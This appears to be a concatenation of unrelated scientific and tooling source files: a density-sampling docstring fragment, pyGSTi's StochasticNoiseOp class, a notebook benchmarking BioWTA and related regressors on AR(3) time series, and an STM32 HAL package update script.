of distances among nearest neighbors) the extent of the regions centered
around each sample point to consider for the computation of the local density
associated to that particular sample point.
outlier_percentile : float, optional (default = 0.01)
Specify the outlier density as a percentile of the distribution of local densities.
target_percentile : float, optional (default = 0.05)
Specifiy the target density as a percentile of the distribution of local densities.
Relevant only if 'desired_samples' is left unspecified.
desired_samples : int, optional (default = None)
The number of samples to be selected from the whole data-set such that members
of rare populations and members of more common populations are roughly
equally represented. To that purpose, a target density is computed that to selects about
'desired_samples' data-points.
Returns
-------
samples_kept : array of shape (n_selected_samples,)
If the 'i'-th sample point of 'data' has been selected by a given instance of
density sampling, number 'i' is featured in the array returned by
the present function.
"""
random_state = np.random.RandomState()
data = np.atleast_2d(data)
for x in (kernel_mult, outlier_percentile, target_percentile):
assert isinstance(x, numbers.Real) and x > 0
for x in (outlier_percentile, target_percentile):
assert x <= 1.0
if local_densities is None:
| |
"""
The StochasticNoiseOp class and supporting functionality.
"""
#***************************************************************************************************
# Copyright 2015, 2019 National Technology & Engineering Solutions of Sandia, LLC (NTESS).
# Under the terms of Contract DE-NA0003525 with NTESS, the U.S. Government retains certain rights
# in this software.
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 or in the LICENSE file in the root pyGSTi directory.
#***************************************************************************************************
import numpy as _np
from pygsti.modelmembers.operations.linearop import LinearOperator as _LinearOperator
from pygsti.modelmembers import modelmember as _modelmember, term as _term
from pygsti.evotypes import Evotype as _Evotype
from pygsti.baseobjs import statespace as _statespace
from pygsti.baseobjs.basis import Basis as _Basis
from pygsti.baseobjs.polynomial import Polynomial as _Polynomial
class StochasticNoiseOp(_LinearOperator):
"""
A stochastic noise operation.
Implements the stochastic noise map:
`rho -> (1-sum(p_i))rho + sum_(i>0) p_i * B_i * rho * B_i^dagger`
where `p_i > 0` and `sum(p_i) < 1`, and `B_i` is basis where `B_0` is the identity.
In the case of the 'chp' evotype, the `B_i` element is returned with
probability `p_i`, such that the outcome distribution matches the aforementioned
stochastic noise map when considered over many samples.
Parameters
----------
state_space : StateSpace, optional
The state space for this operation.
basis : Basis or {'pp','gm','qt'}, optional
The basis to use, defining the "principle axes"
along which there is stochastic noise. We assume that
the first element of `basis` is the identity.
evotype : Evotype or str, optional
The evolution type. The special value `"default"` is equivalent
to specifying the value of `pygsti.evotypes.Evotype.default_evotype`.
initial_rates : list or array
if not None, a list of `basis.size-1` initial error rates along each of
the directions corresponding to each basis element. If None,
then all initial rates are zero.
seed_or_state : float or RandomState, optional
Random seed for RandomState (or directly provided RandomState)
for sampling stochastic superoperators with the 'chp' evotype.
"""
# Difficult to parameterize and maintain the p_i conditions - Initially just store positive p_i's
# and don't bother restricting their sum to be < 1?
def __init__(self, state_space, basis="pp", evotype="default", initial_rates=None, seed_or_state=None):
state_space = _statespace.StateSpace.cast(state_space)
self.basis = _Basis.cast(basis, state_space.dim, sparse=False)
assert(state_space.dim == self.basis.dim), "Dimension of `basis` must match the dimension (`dim`) of this op."
evotype = _Evotype.cast(evotype)
#Setup initial parameters
self.params = _np.zeros(self.basis.size - 1, 'd') # note that basis.dim can be < self.dim (OK)
if initial_rates is not None:
assert(len(initial_rates) == self.basis.size - 1), \
"Expected %d initial rates but got %d!" % (self.basis.size - 1, len(initial_rates))
self.params[:] = self._rates_to_params(initial_rates)
rates = _np.array(initial_rates)
else:
rates = _np.zeros(len(self.params), 'd')
rep = evotype.create_stochastic_rep(self.basis, self._get_rate_poly_dicts(), rates, seed_or_state, state_space)
_LinearOperator.__init__(self, rep, evotype)
self._update_rep() # initialize self._rep
self._paramlbls = _np.array(['sqrt(%s error rate)' % bl for bl in self.basis.labels[1:]], dtype=object)
def _update_rep(self):
# Create dense error superoperator from paramvec
self._rep.update_rates(self._params_to_rates(self.params))
def _rates_to_params(self, rates):
return _np.sqrt(_np.array(rates))
def _params_to_rates(self, params):
return params**2
def _get_rate_poly_dicts(self):
""" Return a list of dicts, one per rate, expressing the
rate as a polynomial of the local parameters (tuple
keys of dicts <=> poly terms, e.g. (1,1) <=> x1^2) """
return [{(i, i): 1.0} for i in range(self.basis.size - 1)] # rates are just parameters squared
def to_dense(self, on_space='minimal'):
"""
Return this operation as a dense matrix.
Parameters
----------
on_space : {'minimal', 'Hilbert', 'HilbertSchmidt'}
The space that the returned dense operation acts upon. For unitary matrices and bra/ket vectors,
use `'Hilbert'`. For superoperator matrices and super-bra/super-ket vectors use `'HilbertSchmidt'`.
`'minimal'` means that `'Hilbert'` is used if possible given this operator's evolution type, and
otherwise `'HilbertSchmidt'` is used.
Returns
-------
numpy.ndarray
"""
return self._rep.to_dense(on_space)
@property
def num_params(self):
"""
Get the number of independent parameters which specify this operation.
Returns
-------
int
the number of independent parameters.
"""
return len(self.to_vector())
def to_vector(self):
"""
Extract a vector of the underlying operation parameters from this operation.
Returns
-------
numpy array
a 1D numpy array with length == num_params().
"""
return self.params
def from_vector(self, v, close=False, dirty_value=True):
"""
Initialize the operation using a vector of parameters.
Parameters
----------
v : numpy array
The 1D vector of operation parameters. Length
must == num_params()
close : bool, optional
Whether `v` is close to this operation's current
set of parameters. Under some circumstances, when this
is true this call can be completed more quickly.
dirty_value : bool, optional
The value to set this object's "dirty flag" to before exiting this
call. This is passed as an argument so it can be updated *recursively*.
Leave this set to `True` unless you know what you're doing.
Returns
-------
None
"""
self.params[:] = v
self._update_rep()
self.dirty = dirty_value
def taylor_order_terms(self, order, max_polynomial_vars=100, return_coeff_polys=False):
"""
Get the `order`-th order Taylor-expansion terms of this operation.
This function either constructs or returns a cached list of the terms at
the given order. Each term is "rank-1", meaning that its action on a
density matrix `rho` can be written:
`rho -> A rho B`
The coefficients of these terms are typically polynomials of the operation's
parameters, where the polynomial's variable indices index the *global*
parameters of the operation's parent (usually a :class:`Model`), not the
operation's local parameter array (i.e. that returned from `to_vector`).
Parameters
----------
order : int
Which order terms (in a Taylor expansion of this :class:`LindbladOp`)
to retrieve.
max_polynomial_vars : int, optional
maximum number of variables the created polynomials can have.
return_coeff_polys : bool
Whether a parallel list of locally-indexed (using variable indices
corresponding to *this* object's parameters rather than its parent's)
polynomial coefficients should be returned as well.
Returns
-------
terms : list
A list of :class:`RankOneTerm` objects.
coefficients : list
Only present when `return_coeff_polys == True`.
A list of *compact* polynomial objects, meaning that each element
is a `(vtape,ctape)` 2-tuple formed by concatenating together the
output of :method:`Polynomial.compact`.
"""
def _compose_poly_indices(terms):
for term in terms:
term.map_indices_inplace(lambda x: tuple(_modelmember._compose_gpindices(
self.gpindices, _np.array(x, _np.int64))))
return terms
IDENT = None # sentinel for the do-nothing identity op
mpv = max_polynomial_vars
if order == 0:
polydict = {(): 1.0}
for pd in self._get_rate_poly_dicts():
polydict.update({k: -v for k, v in pd.items()}) # subtracts the "rate" `pd` from `polydict`
loc_terms = [_term.RankOnePolynomialOpTerm.create_from(_Polynomial(polydict, mpv),
IDENT, IDENT, self._evotype, self.state_space)]
elif order == 1:
loc_terms = [_term.RankOnePolynomialOpTerm.create_from(_Polynomial(pd, mpv), bel, bel,
self._evotype, self.state_space)
for i, (pd, bel) in enumerate(zip(self.rate_poly_dicts, self.basis.elements[1:]))]
else:
loc_terms = [] # only first order "taylor terms"
poly_coeffs = [t.coeff for t in loc_terms]
tapes = [poly.compact(complex_coeff_tape=True) for poly in poly_coeffs]
if len(tapes) > 0:
vtape = _np.concatenate([t[0] for t in tapes])
ctape = _np.concatenate([t[1] for t in tapes])
else:
vtape = _np.empty(0, _np.int64)
ctape = _np.empty(0, complex)
coeffs_as_compact_polys = (vtape, ctape)
local_term_poly_coeffs = coeffs_as_compact_polys
global_param_terms = _compose_poly_indices(loc_terms)
if return_coeff_polys:
return global_param_terms, local_term_poly_coeffs
else:
return global_param_terms
@property
def total_term_magnitude(self):
"""
Get the total (sum) of the magnitudes of all this operator's terms.
The magnitude of a term is the absolute value of its coefficient, so
this function returns the number you'd get from summing up the
absolute-coefficients of all the Taylor terms (at all orders!) you
get from expanding this operator in a Taylor series.
Returns
-------
float
"""
# return exp( mag of errorgen ) = exp( sum of absvals of errgen term coeffs )
# (unitary postfactor has weight == 1.0 so doesn't enter)
rates = self._params_to_rates(self.to_vector())
return _np.sum(_np.abs(rates))
@property
def total_term_magnitude_deriv(self):
"""
The derivative of the sum of *all* this operator's terms.
Computes the derivative of the total (sum) of the magnitudes of all this
operator's terms with respect to the operators (local) parameters.
Returns
-------
numpy array
An array of length self.num_params
"""
# abs(rates) = rates = params**2
# so d( sum(abs(rates)) )/dparam_i = 2*param_i
return 2 * self.to_vector()
#Transform functions? (for gauge opt)
def to_memoized_dict(self, mmg_memo):
"""Create a serializable dict with references to other objects in the memo.
Parameters
----------
mmg_memo: dict
Memo dict from a ModelMemberGraph, i.e. keys are object ids and values
are ModelMemberGraphNodes (which contain the serialize_id). This | |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.4.2
# kernelspec:
# display_name: bio_time_series
# language: python
# name: bio_time_series
# ---
# %%
# %load_ext autoreload
# %autoreload 2
# %matplotlib inline
# %config InlineBackend.print_figure_kwargs = {'bbox_inches': None}
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import time
import pandas as pd
from tqdm.notebook import tqdm
from bioslds.arma import Arma
from bioslds.dataset import RandomArmaDataset
from bioslds.plotting import FigureManager, show_latent
from bioslds.cluster_quality import unordered_accuracy_score
from bioslds.batch import hyper_score_ar
from bioslds.regressors import (
BioWTARegressor,
CrosscorrelationRegressor,
CepstralRegressor,
)
from draft_helpers import (
paper_style,
calculate_ar_identification_progress,
make_multi_trajectory_plot,
make_accuracy_plot,
predict_plain_score,
make_accuracy_comparison_diagram,
get_accuracy_metrics,
calculate_smooth_weight_errors,
)
fig_path = os.path.join("..", "figs", "draft")
# %% [markdown]
# # Run BioWTA, autocorrelation, and cepstral oracle algorithms on signals based on pairs of AR(3) processes
# %% [markdown]
# ## Define the problem and the parameters for the learning algorithms
# %% [markdown]
# Using best parameters obtained from hyperoptimization runs.
# %%
n_signals = 100
n_samples = 200_000
orders = [(3, 0), (3, 0)]
dwell_times = 100
min_dwell = 50
max_pole_radius = 0.95
normalize = True
fix_scale = None
seed = 153
n_models = 2
n_features = 3
rate_nsm = 0.005028
streak_nsm = 9.527731
rate_cepstral = 0.071844
order_cepstral = 2
metric = unordered_accuracy_score
good_score = 0.85
threshold_steps = 10_000
dataset = RandomArmaDataset(
n_signals,
n_samples,
orders,
dwell_times=dwell_times,
min_dwell=min_dwell,
fix_scale=fix_scale,
normalize=normalize,
rng=seed,
arma_kws={"max_pole_radius": max_pole_radius},
)
# %% [markdown]
# ## Run BioWTA with all combinations of enhancements
# %%
biowta_configurations = {
(1, 1, 0): {
"rate": 0.001992,
"trans_mat": 1 - 1 / 7.794633,
"temperature": 1.036228,
"error_timescale": 1.000000,
},
(0, 0, 1): {
"rate": 0.004718,
"trans_mat": 1 - 1 / 2.000000,
"temperature": 0.000000,
"error_timescale": 4.216198,
},
(1, 1, 1): {
"rate": 0.004130,
"trans_mat": 1 - 1 / 5.769690,
"temperature": 0.808615,
"error_timescale": 1.470822,
},
(0, 1, 1): {
"rate": 0.004826,
"trans_mat": 1 - 1 / 2.154856,
"temperature": 0.000000,
"error_timescale": 4.566321,
},
(1, 0, 1): {
"rate": 0.006080,
"trans_mat": 1 - 1 / 2.000000,
"temperature": 0.117712,
"error_timescale": 4.438448,
},
(0, 1, 0): {
"rate": 0.001476,
"trans_mat": 1 - 1 / 2.984215,
"temperature": 0.000000,
"error_timescale": 1.000000,
},
(0, 0, 0): {
"rate": 0.001199,
"trans_mat": 1 - 1 / 2.000000,
"temperature": 0.000000,
"error_timescale": 1.000000,
},
(1, 0, 0): {
"rate": 0.005084,
"trans_mat": 1 - 1 / 2.000000,
"temperature": 0.011821,
"error_timescale": 1.000000,
},
}
biowta_configurations_human = {
(0, 0, 0): "plain",
(0, 0, 1): "avg_error",
(0, 1, 0): "persistent",
(1, 0, 0): "soft",
(0, 1, 1): "persistent+avg_error",
(1, 1, 0): "soft+persistent",
(1, 0, 1): "soft+avg_error",
(1, 1, 1): "full",
}
# %%
result_biowta_mods = {}
for key in tqdm(biowta_configurations, desc="biowta cfg"):
result_biowta_mods[key] = hyper_score_ar(
BioWTARegressor,
dataset,
metric,
n_models=n_models,
n_features=n_features,
progress=tqdm,
monitor=["r", "weights_", "prediction_"],
**biowta_configurations[key],
)
crt_scores = result_biowta_mods[key][1].trial_scores
crt_median = np.median(crt_scores)
crt_quantile = np.quantile(crt_scores, 0.05)
crt_good = np.mean(crt_scores > good_score)
print(
f"{''.join(str(_) for _ in key)}: median={crt_median:.4f}, "
f"5%={crt_quantile:.4f}, "
f"fraction>{int(100 * good_score)}%={crt_good:.4f}"
)
# %%
for key in tqdm(biowta_configurations, desc="biowta cfg, reconstruction progress"):
calculate_ar_identification_progress(result_biowta_mods[key][1].history, dataset)
# %% [markdown]
# Find some "good" indices in the dataset: one that obtains an accuracy score close to a chosen threshold for "good-enough" (which we set to 85%); and one that has a similar score but also has small reconstruction error for the weights.
# %%
result_biowta_chosen = result_biowta_mods[1, 1, 0]
crt_mask = (result_biowta_chosen[1].trial_scores > 0.98 * good_score) & (
result_biowta_chosen[1].trial_scores < 1.02 * good_score
)
crt_idxs = crt_mask.nonzero()[0]
crt_errors_norm = np.asarray(
[np.mean(_.weight_errors_normalized_[-1]) for _ in result_biowta_chosen[1].history]
)
good_biowta_idx = crt_idxs[np.argmax(crt_errors_norm[crt_mask])]
good_biowta_ident_idx = crt_idxs[np.argmin(crt_errors_norm[crt_mask])]
good_idxs = [good_biowta_ident_idx, good_biowta_idx]
# %%
result_biowta_chosen[1].trial_scores[good_idxs]
# %%
crt_errors_norm[good_idxs]
# %%
for key in biowta_configurations:
make_multi_trajectory_plot(
result_biowta_mods[key][1],
dataset,
n_traces=25,
highlight_idx=good_idxs,
sliding_kws={"window_size": 5000, "overlap_fraction": 0.8},
trace_kws={"alpha": 0.85, "lw": 0.75, "color": "gray"},
rug_kws={"alpha": 0.3},
)
# %% [markdown]
# ## Run learning and inference for autocorrelation and cepstral methods
# %%
t0 = time.time()
result_xcorr = hyper_score_ar(
CrosscorrelationRegressor,
dataset,
metric,
n_models=n_models,
n_features=n_features,
nsm_rate=rate_nsm,
xcorr_rate=1 / streak_nsm,
progress=tqdm,
monitor=["r", "nsm.weights_", "xcorr.coef_"],
)
t1 = time.time()
print(
f"Median accuracy score xcorr: {result_xcorr[0]:.2}. "
f"(Took {t1 - t0:.2f} seconds.)"
)
# %%
t0 = time.time()
result_cepstral = hyper_score_ar(
CepstralRegressor,
dataset,
metric,
cepstral_order=order_cepstral,
cepstral_kws={"rate": rate_cepstral},
initial_weights="oracle_ar",
progress=tqdm,
monitor=["r"],
)
t1 = time.time()
print(
f"Median accuracy score cepstral: {result_cepstral[0]:.2}. "
f"(Took {t1 - t0:.2f} seconds.)"
)
# %% [markdown]
# ## Run BioWTA with weights fixed at ground-truth values
# %%
t0 = time.time()
oracle_biowta = hyper_score_ar(
BioWTARegressor,
dataset,
metric,
n_models=n_models,
n_features=n_features,
rate=0,
trans_mat=biowta_configurations[1, 1, 0]["trans_mat"],
temperature=biowta_configurations[1, 1, 0]["temperature"],
error_timescale=biowta_configurations[1, 1, 0]["error_timescale"],
initial_weights="oracle_ar",
progress=tqdm,
monitor=["r", "prediction_"],
)
t1 = time.time()
print(
f"Median accuracy score oracle BioWTA: {oracle_biowta[0]:.2}. "
f"(Took {t1 - t0:.2f} seconds.)"
)
# %% [markdown]
# ## Make plots
# %%
fig, axs = make_accuracy_plot(
result_biowta_chosen[1], oracle_biowta[1], dataset, good_idxs
)
axs[0, 2].set_xlabel("enh. BioWTA oracle")
axs[0, 2].set_ylabel("enh. BioWTA")
fig.savefig(
os.path.join(fig_path, "rolling_accuracy_2x_ar3_100trials_biowta.png"), dpi=600
)
# %%
crt_frac_good = np.mean(result_biowta_chosen[1].trial_scores > good_score)
print(
f"Percentage of runs with BioWTA accuracies over {int(good_score * 100)}%: "
f"{int(crt_frac_good * 100)}%."
)
crt_frac_fast = np.mean(
np.asarray(result_biowta_chosen[1].convergence_times) <= threshold_steps
)
print(
f"Percentage of runs with BioWTA convergence times under {threshold_steps}: "
f"{int(crt_frac_fast * 100)}%."
)
# %%
fig, axs = make_accuracy_plot(result_xcorr[1], oracle_biowta[1], dataset, good_idxs)
axs[0, 2].set_xlabel("enh. BioWTA oracle")
axs[0, 2].set_ylabel("autocorrelation")
fig.savefig(
os.path.join(fig_path, "rolling_accuracy_2x_ar3_100trials_xcorr.png"), dpi=600
)
# %%
print(
f"Percentage of runs with xcorr accuracies over {int(good_score * 100)}%: "
f"{int(np.mean(result_xcorr[1].trial_scores > good_score) * 100)}%."
)
threshold_steps = 10_000
print(
f"Percentage of runs with xcorr convergence times under {threshold_steps}: "
f"{int(np.mean(np.asarray(result_xcorr[1].convergence_times) <= threshold_steps) * 100)}%."
)
threshold_steps_small = 1000
print(
f"Percentage of runs with xcorr convergence times under {threshold_steps_small}: "
f"{int(np.mean(np.asarray(result_xcorr[1].convergence_times) <= threshold_steps_small) * 100)}%."
)
# %%
fig, axs = make_accuracy_plot(result_cepstral[1], oracle_biowta[1], dataset, good_idxs)
axs[0, 2].set_xlabel("enh. BioWTA oracle")
axs[0, 2].set_ylabel("cepstral oracle")
fig.savefig(
os.path.join(fig_path, "rolling_accuracy_2x_ar3_100trials_cepstral.png"), dpi=600
)
# %%
print(
f"Percentage of runs with cepstral accuracies over {int(good_score * 100)}%: "
f"{int(np.mean(result_cepstral[1].trial_scores > good_score) * 100)}%."
)
threshold_steps = 10_000
print(
f"Percentage of runs with cepstral convergence times under {threshold_steps}: "
f"{int(np.mean(np.asarray(result_cepstral[1].convergence_times) <= threshold_steps) * 100)}%."
)
threshold_steps_small = 1000
print(
f"Percentage of runs with cepstral convergence times under {threshold_steps_small}: "
f"{int(np.mean(np.asarray(result_cepstral[1].convergence_times) <= threshold_steps_small) * 100)}%."
)
# %% [markdown]
# # Explain variability in BioWTA accuracy scores, show effect of algorithm improvements
# %%
predicted_plain_scores = [
predict_plain_score(crt_sig.armas, sigma_ratio=1.0 / crt_sig.scale)
for crt_sig in tqdm(dataset)
]
# %%
with plt.style.context(paper_style):
with FigureManager(
1,
2,
gridspec_kw={"width_ratios": (12, 2)},
despine_kws={"offset": 5},
figsize=(2.8, 1.5),
constrained_layout=True,
) as (fig, axs):
crt_sigma = 0.5
crt_pred1 = -crt_sigma
crt_pred2 = crt_sigma
crt_thresh = 0.5 * (crt_pred1 + crt_pred2)
crt_samples = [-0.3, 1.0, -0.7, 0.4, -1.3, -0.6, 0.3, -0.2, -0.5]
crt_n = len(crt_samples)
crt_usage = np.zeros(crt_n + 1, dtype=int)
axs[0].plot(crt_samples, ".-", c="gray")
# axs[0].axhline(0, ls=":", c="gray")
crt_box = [[crt_n - 0.4, crt_n + 0.4], [-1.4, 1.4]]
axs[0].plot(
crt_box[0] + crt_box[0][::-1] + [crt_box[0][0]],
[crt_box[1][0]] + crt_box[1] + crt_box[1][::-1],
"k-",
)
crt_p_range = (-1.5, 1.5)
axs[0].set_ylim(*crt_p_range)
axs[0].set_xlabel("time step")
axs[0].set_ylabel("signal $y(t)$")
axs[0].set_xticks([0, len(crt_samples)])
axs[0].set_xticklabels([0, "$\\tau$"])
show_latent(crt_usage, ax=axs[0])
axs[0].annotate(
"ground truth: model 1",
(0.5, axs[0].get_ylim()[1] - 0.03),
color="w",
verticalalignment="top",
fontsize=6,
fontweight="bold",
)
crt_ps = np.linspace(*crt_p_range, 100)
crt_dist = (
1
/ np.sqrt(2 * np.pi * crt_sigma ** 2)
* np.exp(-0.5 * ((crt_ps - crt_pred1) / crt_sigma) ** 2)
)
for crt_y, crt_p in zip(crt_ps, crt_dist):
if crt_y < crt_box[1][0] or crt_y >= crt_box[1][1]:
continue
axs[0].plot(
[crt_n - 1, crt_box[0][0]],
[crt_samples[-1], crt_y],
c="gray",
alpha=0.5 * crt_p,
)
axs[0].plot(
[crt_box[0][0] + 0.01, crt_box[0][1] - 0.01],
[crt_y, crt_y],
c="gray",
alpha=0.5 * crt_p,
)
crt_col1 = "C0"
crt_col2 = "C1"
crt_col_err1 = "C1"
crt_col_err2 = "C4"
crt_x0 = 1.00
axs[1].annotate(
"model 1",
xy=(crt_x0, crt_pred1),
verticalalignment="center",
# fontweight="bold",
fontsize=7,
color=crt_col1,
)
axs[1].annotate(
"model 2",
xy=(crt_x0, crt_pred2),
verticalalignment="center",
# fontweight="bold",
fontsize=7,
color=crt_col2,
)
axs[1].annotate(
"decision\nboundary",
xy=(crt_x0, crt_thresh),
verticalalignment="center",
# fontweight="bold",
fontsize=7,
color="gray",
linespacing=0.8,
)
crt_cut_idx = np.argmin(np.abs(crt_ps - crt_thresh))
axs[1].plot(
crt_dist[: crt_cut_idx + 1],
crt_ps[: crt_cut_idx + 1],
c=crt_col1,
alpha=0.8,
)
axs[1].plot(
crt_dist[crt_cut_idx:], crt_ps[crt_cut_idx:], c=crt_col_err1, alpha=0.8
)
axs[1].plot(-crt_dist, crt_ps, c="gray", alpha=0.8)
axs[1].fill_betweenx(
crt_ps, -crt_dist, color="gray", alpha=0.3,
)
axs[1].fill_betweenx(
crt_ps[: crt_cut_idx + 1],
crt_dist[: crt_cut_idx + 1],
color=crt_col1,
alpha=0.3,
)
axs[1].fill_betweenx(
crt_ps[crt_cut_idx:], crt_dist[crt_cut_idx:], color=crt_col_err1, alpha=0.3
)
axs[1].axhline(crt_pred1, c=crt_col1, ls=":")
axs[1].axhline(crt_pred2, c=crt_col2, ls=":")
axs[1].axhline(crt_thresh, c="gray", ls="--")
axs[1].set_xlim(-1.0, crt_x0)
axs[1].set_ylim(*crt_p_range)
axs[1].set_xlabel("pdf $y(t=\\tau)$")
axs[1].set_yticks([])
axs[1].set_xticks([0])
axs[1].set_xticklabels([" "])
sns.despine(left=True, ax=axs[1])
fig.savefig(
os.path.join(fig_path, "explanation_for_biowta_segmentation_errors.pdf"),
transparent=True,
)
# %%
with plt.style.context(paper_style):
with FigureManager(
1, 2, despine_kws={"offset": 5}, figsize=(3, 1.5), constrained_layout=True
) as (fig, axs):
axs[0].plot([0.5, 1], [0.5, 1], "--", c="gray", zorder=-15)
axs[0].scatter(
predicted_plain_scores,
result_biowta_mods[0, 0, 0][1].trial_scores,
s=6,
c="C2",
alpha=0.5,
)
axs[0].set_aspect(1)
axs[0].set_xlabel("expectation")
axs[0].set_ylabel("plain BioWTA")
axs[0].set_xlim([0.5, 1])
axs[0].set_ylim([0.5, 1])
axs[1].plot([0.5, 1], [0.5, 1], "--", c="gray", zorder=-15)
axs[1].scatter(
predicted_plain_scores,
result_biowta_chosen[1].trial_scores,
s=6,
c="C3",
alpha=0.5,
)
axs[1].set_aspect(1)
axs[1].set_xlabel("expectation")
axs[1].set_ylabel("enh. BioWTA")
axs[1].set_xlim([0.5, 1])
axs[1].set_ylim([0.5, 1])
fig.savefig(
os.path.join(fig_path, "plain_vs_enh_biowta.pdf"), transparent=True,
)
# %%
with plt.style.context(paper_style):
with FigureManager(despine_kws={"offset": 5}, figsize=(5.76, 1.5)) as (fig, ax):
crt_x_values = []
crt_y_values = []
mod_sel = {
"no enhancements\n(plain BioWTA)": (0, 0, 0),
"persistent": (0, 1, 0),
"soft\npersistent\n(enh. BioWTA)": (1, 1, 0),
"soft\npersistent\naveraging": (1, 1, 1),
"averaging\nonly": (0, 0, 1),
}
for i, (crt_name, crt_mod) in enumerate(mod_sel.items()):
crt_scores = result_biowta_mods[crt_mod][1].trial_scores
crt_y_values.extend(crt_scores)
crt_x_values.extend([i] * len(crt_scores))
| |
<reponame>koson/hal_stm32
#!/usr/bin/python
"""
SPDX-License-Identifier: Apache-2.0
Copyright (c) 2019 STMicroelectronics.
This script define Stm32SerieUpdate class
to be used by update_stm32_package.py
"""
import os
import stat
import shutil
import subprocess
import re
from pathlib import Path
import logging
STM32_CUBE_REPO_BASE = "https://github.com/STMicroelectronics/STM32Cube"
logging.basicConfig(level=logging.INFO)
def remove_readonly(func, path, _):
"""Remove read only protection"""
os.chmod(path, stat.S_IWRITE)
func(path)
def os_cmd(cmd, cwd=None, shell=False):
"""Execute a command with subprocess.check_call()
Args:
cmd: string command to execute.
cwd: directory where to run command
shell: boolean to enable command interpretation by the shell
Returns:
return the returncode of the command after execution.
"""
logging.info(cmd)
return subprocess.check_call(cmd, shell=shell, cwd=cwd)
class Stm32SerieUpdate:
"""class Stm32SerieUpdate"""
def __init__(self, stm32_serie, stm32cube_repo_path, force, noclean):
"""Class Stm32SerieUpdate constructor
Args:
stm32_serie: stm32 serie ex:stm32f3xx
stm32cube_repo_path: directory path where to fetch github repo
force: boolean to force or not git commit after applying update
noclean: boolean to clean or not github repo after update done
Returns:
return previous zephyr cube version.
Raises:
ValueError: If stm32 serie is not recognised.
FileNotFoundError: If Zphyr STM32 cube path is not found
"""
if not stm32_serie.startswith("stm32"):
raise ValueError(
"Error: Unknown stm32 serie: "
+ stm32_serie
+ ". Must start with 'stm32'"
)
# Set serie variables
self.stm32_serie = stm32_serie
self.stm32_seriexx = stm32_serie + "xx" # ex:stm32f3xx
self.stm32_serie_upper = stm32_serie.upper() # ex:STM32F3
self.stm32_seriexx_upper = self.stm32_serie_upper + "xx" # ex:STM32F3xx
self.serie = self.stm32_serie_upper[5:]
self.force = force
self.noclean = noclean
# ##### 3 root directories to work with ########
# 1: STM32Cube repo Default $HOME/STM32Cube_repo
# 2 : zephyr stm32 path : ex: .../zephyr_project/module/hal/stm32
# 3: Temporary directory to construct the update
# (within STM32Cube repo dir)
self.stm32cube_repo_path = stm32cube_repo_path
if not self.stm32cube_repo_path.exists():
self.stm32cube_repo_path.mkdir()
self.zephyr_hal_stm32_path = (
Path(os.getenv("ZEPHYR_BASE")).absolute()
/ ".."
/ "modules"
/ "hal"
/ "stm32"
)
if not self.zephyr_hal_stm32_path.exists():
raise FileNotFoundError("Error: cannot find zephyr project")
self.stm32cube_temp = self.stm32cube_repo_path / "temp_stm32xx_update"
if self.stm32cube_temp.exists():
shutil.rmtree(str(self.stm32cube_temp), onerror=remove_readonly)
self.stm32cube_temp.mkdir()
# subdir specific to a stm32 serie
self.stm32cube_serie_path = self.stm32cube_repo_path / Path(
"STM32Cube" + self.serie
)
self.zephyr_module_serie_path = (
self.zephyr_hal_stm32_path / "stm32cube" / self.stm32_seriexx
)
self.stm32cube_temp_serie = (
self.stm32cube_temp / "stm32cube" / self.stm32_seriexx
)
shutil.rmtree(str(self.stm32cube_temp), onerror=remove_readonly)
self.stm32cube_temp_serie.mkdir(parents=True)
self.readme_file_path = self.zephyr_module_serie_path / "README"
self.version_tag = []
self.current_version = ""
self.latest_version = ""
self.latest_commit = ""
def clone_cube_repo(self):
"""Clone or fetch a stm32 serie repo"""
# check whether master branch exist, otherwise use main branch
master_branch_exist = subprocess.check_output(
"git ls-remote --heads origin master", cwd=self.stm32cube_serie_path
).decode("utf-8")
if master_branch_exist:
branch = "master"
else:
branch = "main"
logging.info("Branch used:" + branch)
if self.stm32cube_serie_path.exists():
logging.info("fetching repo " + str(self.stm32cube_serie_path))
# if already exists, then just clean and fetch
os_cmd(("git", "clean", "-fdx"), cwd=self.stm32cube_serie_path)
os_cmd(("git", "fetch"), cwd=self.stm32cube_serie_path)
os_cmd(
("git", "reset", "--hard", branch),
cwd=self.stm32cube_serie_path,
)
else:
os_cmd(
("git", "clone", STM32_CUBE_REPO_BASE + self.serie + ".git"),
cwd=self.stm32cube_repo_path,
)
# get the latest version of cube,
# with the most recent one created being the last entry.
os_cmd(("git", "checkout", branch), cwd=self.stm32cube_serie_path)
self.version_tag = subprocess.check_output(
("git", "tag", "-l"),
cwd=self.stm32cube_serie_path
).splitlines()
self.version_tag = [x.decode("utf-8") for x in self.version_tag]
# Set latest version
self.latest_version = self.version_tag[-1]
def get_zephyr_current_version(self):
"""Look for current zephyr hal version
Returns:
return previous zephyr cube version.
Raises:
ValueError: If version is not found.
"""
with open(str(self.readme_file_path), "r") as f:
for line in f:
# pattern : "version " follow by optional "v",
# followed by x.y or x.y.z x,y,z may represent several digits
# ex: 'version v1.8.9', 'version 10.20.25'
pattern = r".*version v?(\d+\.\d+\.?\d*).*$"
if re.match(pattern, line):
previous_version = re.sub(pattern, r"\1", line).rstrip("\n")
break
# Match previous version and list of existing tags
# which could be vx.y or x.y
pos_version = [
i for i, a in enumerate(self.version_tag) if previous_version in a
]
if pos_version:
# return previous zephyr version
return self.version_tag[pos_version[0]]
else:
self.clean_files()
raise ValueError(
"Error: cannot find version "
+ previous_version
+ " in STM32Cube_repo"
)
def extract_source(self):
"""Extract sources and includes files from STM32Cube repo
and copy them in temporary directory
"""
# for CMSIS files
temp_cmsis_soc_path = self.stm32cube_temp_serie / "soc"
Path.mkdir(temp_cmsis_soc_path, parents=True)
stm32cube_cmsis_include_path = (
self.stm32cube_serie_path
/ "Drivers"
/ "CMSIS"
/ "Device"
/ "ST"
/ self.stm32_seriexx_upper
/ "Include"
)
os_cmd(
(
"cp",
"-r",
str(stm32cube_cmsis_include_path),
str(temp_cmsis_soc_path),
)
)
stm32cube_cmsis_templates_path = (
self.stm32cube_serie_path
/ "Drivers"
/ "CMSIS"
/ "Device"
/ "ST"
/ self.stm32_seriexx_upper
/ "Source"
/ "Templates"
)
for repo_file in stm32cube_cmsis_templates_path.iterdir():
repo_src = stm32cube_cmsis_templates_path / repo_file
if repo_src.is_file():
shutil.copy(str(repo_src), str(temp_cmsis_soc_path))
# for hal and ll drivers
